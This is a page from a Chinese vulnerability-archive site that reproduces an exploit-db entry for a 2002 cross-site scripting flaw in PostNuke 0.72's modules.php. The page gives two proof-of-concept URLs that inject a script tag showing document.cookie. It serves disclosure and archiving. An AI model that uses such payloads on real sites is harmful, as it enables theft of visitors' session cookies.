PostNuke 0.72 – ‘modules.php’ Cross-Site Scripting-安全小百科

PostNuke 0.72 – ‘modules.php’ Cross-Site Scripting

漏洞ID	1053620	漏洞类型
发布时间	2002-09-26	更新时间	2002-09-26
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	PHP	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/21873

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

source: http://www.securityfocus.com/bid/5809/info

A cross site scripting vulnerability has been reported for PostNuke. 

An attacker may exploit this vulnerability by enticing a victim user to follow a malicious link. Attacker-supplied HTML and script code may be executed on a web client in the context of the site hosting the web-based forum.

http://news.postnuke.com/modules.php?op=modload&name=News&file=index&catid=&topic=>
<script>alert(document.cookie);</script>

http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid=
<script>alert(document.cookie);</script+>

相关推荐: Mindstorm Networks SmartFTP Daemon 0.2 Directory Traversal Vulnerability

Mindstorm Networks SmartFTP Daemon 0.2 Directory Traversal Vulnerability 漏洞ID 1104138 漏洞类型 Input Validation Error 发布时间 2000-06-13 …

文章版权归作者所有，未经允许请勿转载。

THE END